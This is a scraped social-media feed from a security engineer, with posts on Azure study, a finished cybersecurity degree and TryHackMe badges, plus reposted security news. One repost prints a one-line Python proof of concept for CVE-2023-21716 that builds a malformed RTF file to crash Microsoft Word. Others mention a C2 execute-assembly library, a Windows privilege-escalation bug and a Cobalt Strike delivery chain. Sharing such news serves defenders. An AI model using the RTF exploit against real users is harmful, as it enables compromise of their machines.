icebearhacks's profile picture. 🛡️ Security Engineer | 👨‍💻 Hacker | 🧩 Puzzle Solver | 📚 Lifelong Learner | 🎓 @WGUCyberClub

Opinions are my own and not the views of my employer

icebear

@icebearhacks

🛡️ Security Engineer | 👨‍💻 Hacker | 🧩 Puzzle Solver | 📚 Lifelong Learner | 🎓 @WGUCyberClub Opinions are my own and not the views of my employer

Microsoft licensing is very confusing if you're not working with it regularly. Here's an awesome resource to simplify it. m365maps.com #Microsoft


I'll be going through this soon, need to study up on Azure, and the AZ-500 seems like a great start.

Preparing for the AZ-500 certification? Responsible for managing and protecting identities in Azure? Take our new Azure Advanced Identity & Access Management course: bit.ly/45kmIs4 #azure #cloud #cloudsecurity

INEsecurity's tweet image. Preparing for the AZ-500 certification? Responsible for managing and protecting identities in Azure? Take our new Azure Advanced Identity & Access Management course: bit.ly/45kmIs4

#azure #cloud #cloudsecurity


I prefer AWS but, the universe keeps pushing me to Azure. It looks like it's finally time to dive into it.


icebear reposted

Reminder that bsidesct.org/#CallForPapers is open , get your papers in! #bsides #cybersecurity #Hacking #infosec #CFP. Also looking for people interested in submitting CTF challenges.


I completed the last course for my B.S. Cybersecurity and Information Assurance program on 7/31. The diploma is in the mail, and I'll be waiting to put it on the wall. I'll plan to start the Masters program a little later this year. #educationalgrowth #CyberSecurity

icebearhacks's tweet image. I completed the last course for my B.S. Cybersecurity and Information Assurance program on 7/31. The diploma is in the mail, and I'll be waiting to put it on the wall. I'll plan to start the Masters program a little later this year. #educationalgrowth #CyberSecurity

If the code works, is it good code?

Yes %0
No %100

1 vote · Final results


icebear reposted

Hi everyone! I've just released ClrOxide, a rust library that allows you to host the CLR and execute dotnet binaries. 😁 Your Rust C2's can finally do execute-assembly now 😜 github.com/yamakadi/clrox… / crates.io/crates/clroxide


icebear reposted

30 cybersecurity search engines for researchers: 1. Dehashed—View leaked credentials. 2. SecurityTrails—Extensive DNS data. 3. DorkSearch—Really fast Google dorking. 4. ExploitDB—Archive of various exploits. 5. ZoomEye—Gather information about targets.


icebear reposted

CVE-2023-21716 Python PoC (take 2) open("t3zt.rtf","wb").write(("{\\rtf1{\n{\\fonttbl" + "".join([ ("{\\f%dA;}\n" % i) for i in range(0,32761) ]) + "}\n{\\rtlch no crash??}\n}}\n").encode('utf-8'))


"I know that I know nothing". This old quote inspires my curiosity and drives my education. Humility is a great thing my friends.


icebear reposted

We did it again with #LocalPotato! A not-so-common NTLM reflection attack allowing for arbitrary read/write. Basically EoP from user to SYSTEM. Tracked as #CVE-2023-21746 - Windows NTLM EoP Soon more details --> localpotato.com cc @splinter_code

decoder_it's tweet image. We did it again with #LocalPotato! 
A not-so-common NTLM reflection attack allowing for arbitrary read/write. Basically EoP from user to SYSTEM.
Tracked as #CVE-2023-21746 - Windows NTLM EoP
Soon more details --> localpotato.com
cc @splinter_code

icebear reposted

Renamed rundll32 execution should be a critical alert that rises to the top of the SOC queue. Don't wait for correlation to trip, respond ASAP.🚨 Sigma Rule from @cyb3rops : github.com/SigmaHQ/sigma/…

SecurePeacock's tweet image. Renamed rundll32 execution should be a critical alert that rises to the top of the SOC queue. Don't wait for correlation to trip, respond ASAP.🚨
Sigma Rule from @cyb3rops  : github.com/SigmaHQ/sigma/…

#TA580 pretty active today. Dropping more #CobaltStrike Benign Conversations -> (separate email thread) URL -> Password-Protected Zip -> IMG -> LNK -> BAT -> DLL CS config: tria.ge/230110-v3r11sg…



icebear reposted

It's that time of the month again, #patchtuesday patches are out from @msftsecurity. Looks like one exploited in wild CVE-2023-21674 Priv Esc in ALPC

KevTheHermit's tweet image. It's that time of the month again, #patchtuesday patches are out from @msftsecurity. Looks like one exploited in wild CVE-2023-21674 Priv Esc in ALPC

I've earned the Advent of Cyber 4 Badge on TryHackMe for Completing Advent of Cyber 4! tryhackme.com/icebearhacks/b… #tryhackme via @realtryhackme This was a nice event, and something to do everyday before Christmas. It was quite enjoyable.

tryhackme.com

icebearhacks was awarded a badge!

Sharing Your Badge


icebear reposted
tylabs's tweet image.

icebear reposted

Step 1: open a binary in IDA and press F5 Step 2: paste the decompiled code into OpenAI's chatbot Someone's job just got way easier.

JusticeRage's tweet image. Step 1: open a binary in IDA and press F5
Step 2: paste the decompiled code into OpenAI's chatbot

Someone's job just got way easier.
JusticeRage's tweet image. Step 1: open a binary in IDA and press F5
Step 2: paste the decompiled code into OpenAI's chatbot

Someone's job just got way easier.

icebear reposted

What are some tools you can't live without? Here are a few I use: 1. Bpytop: A better version of the Linux `top` command

GrahamHelton3's tweet image. What are some tools you can't live without? Here are a few I use:

1. Bpytop: A better version of the Linux `top` command

icebear reposted

Ho ho hackety ho! 🎅 To celebrate the launch of #AdventOfCyber, we’re giving away a limited edition #TryHackMe Yeti t-shirt. All you have to do is like and retweet! The winner will be chosen at random on Sunday and announced on Monday 12th December. Good luck! 🤞

tryhackme's tweet image. Ho ho hackety ho! 🎅

To celebrate the launch of #AdventOfCyber, we’re giving away a limited edition #TryHackMe Yeti t-shirt. All you have to do is like and retweet!

The winner will be chosen at random on Sunday and announced on Monday 12th December. Good luck! 🤞

If you've never listed to the 'hackable?' podcast, it's a great listen. I listed to a lot of the episodes a few years ago when I was interested in security and really helped pave the path. open.spotify.com/show/77s2POytw…


United States Trends

Loading...

Something went wrong.


Something went wrong.